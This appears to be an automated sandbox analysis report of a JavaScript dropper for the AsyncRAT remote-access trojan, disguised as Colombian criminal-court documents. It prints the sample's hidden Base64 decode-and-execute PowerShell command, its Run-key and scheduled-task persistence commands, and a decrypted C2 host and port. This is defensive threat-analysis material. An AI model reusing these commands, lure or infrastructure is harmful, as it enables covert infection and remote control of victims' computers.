Windows Analysis Report
Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js

Overview

General Information

Sample name: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js
Analysis ID: 1674571
MD5: 55b953145f20e1f6b1f7e7f5741bacec
SHA1: b2e741db6c57f558d4d212c1f64ecec062ea4004
SHA256: a6dba67aae8b3be407bfb4149fca24d9909ae671640121ecd1b9dc9d9f9ee976
Tags: js, user-Yuyuko_Saigyouji

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected MSILDownloaderGeneric
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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' -replace '','';$tempiettos = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($embolic));Invoke-Expression $tempiettos;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8104 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 5716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques. AsyncRAT as delivered by MintsLoader includes a PowerShell module with a DGA. The DGA is similar to MintsLoader's DGA, but generates more domains and uses more than one TLD.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
No configs have been found
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse; Description: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
  • 0xc41a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp; Rule: Windows_Trojan_Asyncrat_11a11ba1; Description: unknown; Author: unknown
  • 0x130d8:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x22fc0:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x15f88:$a2: Stub.exe
  • 0x16018:$a2: Stub.exe
  • 0x25ea0:$a2: Stub.exe
  • 0x25f30:$a2: Stub.exe
  • 0xfb3a:$a3: get_ActivatePong
  • 0x1fa22:$a3: get_ActivatePong
  • 0x132f0:$a4: vmware
  • 0x231d8:$a4: vmware
  • 0x13168:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x23050:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x10a35:$a6: get_SslClient
  • 0x2091d:$a6: get_SslClient
Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp; Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse; Description: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
  • 0x1316a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
  • 0x23052:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
[10 further entries not shown]

Source: 11.2.MSBuild.exe.400000.0.unpack; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 11.2.MSBuild.exe.400000.0.unpack; Rule: Windows_Trojan_Asyncrat_11a11ba1; Description: unknown; Author: unknown
  • 0xc588:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xf438:$a2: Stub.exe
  • 0xf4c8:$a2: Stub.exe
  • 0x8fea:$a3: get_ActivatePong
  • 0xc7a0:$a4: vmware
  • 0xc618:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x9ee5:$a6: get_SslClient
Source: 11.2.MSBuild.exe.400000.0.unpack; Rule: rat_win_asyncrat; Description: Detect AsyncRAT based on specific strings; Author: Sekoia.io
  • 0x8fea:$str01: get_ActivatePong
  • 0x9ee5:$str02: get_SslClient
  • 0x9f01:$str03: get_TcpClient
  • 0x8424:$str04: get_SendSync
  • 0x84d2:$str05: get_IsConnected
  • 0x8d4e:$str06: set_UseShellExecute
  • 0xc8ae:$str07: Pastebin
  • 0xdf46:$str08: Select * from AntivirusProduct
  • 0xf438:$str09: Stub.exe
  • 0xf4c8:$str09: Stub.exe
  • 0xc698:$str10: timeout 3 > NUL
  • 0xc588:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn
  • 0xc618:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
Source: 11.2.MSBuild.exe.400000.0.unpack; Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse; Description: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
  • 0xc61a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
[13 further entries not shown]

Source: amsi64_7776.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi64_7776.amsi.csv; Rule: JoeSecurity_PowershellDecodeAndExecute; Description: Yara detected Powershell decode and execute; Author: Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Downloads\fluctuous.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", ProcessId: 7548, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Downloads\fluctuous.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", ProcessId: 7548, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-26T02:53:50.051922+0200 | 2020424 | 1 | Exploit Kit Activity Detected | 162.159.134.233 | 443 | 192.168.2.4 | 49723 | TCP
2025-04-26T02:53:50.197242+0200 | 2057635 | 1 | A Network Trojan was detected | 162.159.134.233 | 443 | 192.168.2.4 | 49723 | TCP
2025-04-26T02:53:48.006563+0200 | 2049038 | 1 | A Network Trojan was detected | 207.241.233.30 | 443 | 192.168.2.4 | 49720 | TCP
2025-04-26T02:53:50.197242+0200 | 2858295 | 1 | A Network Trojan was detected | 162.159.134.233 | 443 | 192.168.2.4 | 49723 | TCP

AV Detection

Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js; Virustotal: Detection: 31%
Source: Submitted Sample; Neural Call Log Analysis: 99.5%
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: 3030
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: envio2333.duckdns.org
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: | CRACKED BY https://t.me/xworm_v2
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: false
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: AsyncMutex_6SI8OkPnk
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: 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
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: 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
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: null
Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: Default
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: 3030
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: envio2333.duckdns.org
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: | CRACKED BY https://t.me/xworm_v2
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: false
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: AsyncMutex_6SI8OkPnk
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: MIIE8jCCAtqgAwIBAgIQAOQb7nA/hP/L1XXxqdDJNzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNTI1MDUyMTIyWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIykAVxs0s6rZ/dwP6ujJtpnj6RSsCsZN6Cfj1InZxSIswX+zNiKJys8xyLlyexoya3ebLp5gOSzNvGMlxluLm9vCaayOzt8HuaCCUFntv/AIiigkbE2gqVYjh7qdObXhyhAgjuygHDP0QCc+VzP1aVH4CesUy1gGvxgOgmdXok2AjCssH69OYGA/DAdEzaOK7TtFqS2qqCzCldLuNBa2xy0/Yb73Zko42hlx+hvp/ciTNyFDXqIBdUIu/6X3on+ecdW8SiLMjzr8Xf1BHcoVgTbDto7EpNq2a1b2CjI23YMlc+mRq33k6R2Dw0NNZmNdnTjnFFVmZZ419g2qIxR+JetlOui7Lc77pKX5Om0+HBZqQYKTCxMVykxz0G7EuAxIXG01Wlogv1Ulj31UH2APYQpgRyZ2DUhqJ1Ls3MLxd3X4UJ00DLnhOQf4bSxqZityJ+17tFLj/qSw8niWYm9lzor2652DmCyw2tFMOnkrnBStNaymtyE5JiN3hZ+3xLlCShjHbR6ANpnmPJJWyUnVLHzYj9Fg5cVrfcIHfGDxkh6P/x32CuG1uzxFS0NsZIG6dsiNmBJLZ/B+JQp2V5a1ux3bwzlgEd3OYdDAf8KzXjFmnhfLqhBN/e33eAYdLtZ5ijj9VTACHiEA73NNTROv+9MrHe+jlDqDX+JFS2HTRktAgMBAAGjMjAwMB0GA1UdDgQWBBSGuCNUrBGiR5cyCuX6uVeVEgA8yDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBBMeYWK/JJKSBUsQ4Ba2RHStyT+uunyfCP9ht58sDUygZWxFQxl4Tmw1JLTRjU2FNia9d73P3k7BuDux/zSWJy0rc+Yr5H174M86L7rXyM/dhyZ26Ansn3rxNG7OJP+UQh559z7wwa5sVstFlVyAZOYFBUGGGMhCK/odXhRgJxnWwPR5LKzbQKGXNsvYfnyjWsh65631ZSMvoH3eblBluOwhvCHP7MotRPD8xkmMfIL9npMprJRPHco5MnenLv9c1R6x7AS93fEh359l3fOdL1LTU5K7Q0FydPztV19HDkJyotROS1hOiWze1LNQLXQ6701jb20bIcxeeWyfzJSew1p6j/iIvbBBEKoeQVx6gCXN2UHfZRzeoQKzWQPJ9EDaobDIZ6VyBJ3Vg2zCuFtLL73oJzycow0Rudn/2O9FHy6rucrLcyWxi4AiH+a0b2l1GwvZ/46TUdGFvygMflzdSxf/sVeCrYOTxXJBAnCyz1Yx5hcFI/lblBL70necTt0FDnwHQSWyrdouWYWlGupZ9HUKg6IpGEg9tx0mwyvIycHXTeeQ+NVHYR+WmbVcgYy5HIMPPOyAV7FVCjvRfQ9GofgzRasjDKSqMeWChkMC2zMjI6j6WzWDK5ZD6mCcTiP5P0f3tOkYV/+cw2elMNBmmDAnZVPwweENRxZ/YelFug7Q==
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: 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
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: false
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: false
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: null
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: false
Source: 2.2.powershell.exe.13d95f2fb50.0.unpack; String decryptor: Default

Exploits

Source: Yara match; File source: 2.2.powershell.exe.13dac52fb3d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.13da504d358.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.13dac470000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.13dac470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.13da510ce95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.powershell.exe.13da504d358.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: unknown; HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 207.241.233.30:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49723 version: TLS 1.2
              Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheader source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `1dnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.t
askscheduler.fluentsettingsbuilderdnlib.ioloaderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.d
